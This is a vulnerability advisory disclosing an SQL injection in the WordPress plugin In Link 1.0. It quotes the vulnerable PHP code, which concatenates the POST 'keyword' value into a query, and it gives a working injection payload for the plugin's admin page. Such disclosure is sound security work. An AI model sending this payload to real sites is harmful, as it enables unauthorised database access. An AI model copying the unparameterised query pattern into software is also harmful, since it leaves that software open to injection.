WordPress In Link 1.0 SQL Injection
Posted on 22 November 2017
Vulnerability Type: SQL injection is POST parameter "keyword" Affected plugin: --------------------------------------- In Link Version: 1.0 Requires WordPress Version: 2.8 or higher Compatible up to: 2.8 URL: https://wordpress.org/plugins/inlinks/ (plugin has been closed after the report) --------------------------------------- Affected file inlinks/inlinks.php Affected lines: 58 $Keyword = trim($_POST['keyword']); 59 $URL = trim($_POST['url']); 60 $Rel = trim($_POST['rel']); 61 $Target = trim($_POST['target']); 62 $table_name = $wpdb->prefix ."URLKeywordsMapping"; 63 $SelectKeywordURLMappingDetails = "select * from $table_name where FldKeyword LIKE '".$Keyword."'" ; 64 65 $KeywordURLMappingDetails = $wpdb->get_results($SelectKeywordURLMappingDetails); 66 67 if(count($KeywordURLMappingDetails)) 68 { 69 $Message = "<div align='center' style="color:red; font-weight:bold;">The keyword <i>".$Keyword."</i> already exists in the table.</div>"; 70 } More issues seems to exist in the plugin, because of lack of input validation and the lack of use of prepared statements. Affected URL: /wp-admin/options-general.php?page=inlinks%2Finlinks.php POST Parameters (with payload): keyword=gweeperx'or+2=2--+-&url=http%3A%2F%2F127.0.0.4&rel=nofollow&target=_blank&ActionType=AddKeywordURL&Add=Add Tested against: * In Link 1.0 * WordPress 4.9 * mysql Ver 14.14 Distrib 5.7.20, for Linux (x86_64) using EditLine wrapper * PHP 7.0.22-0ubuntu0.16.04.1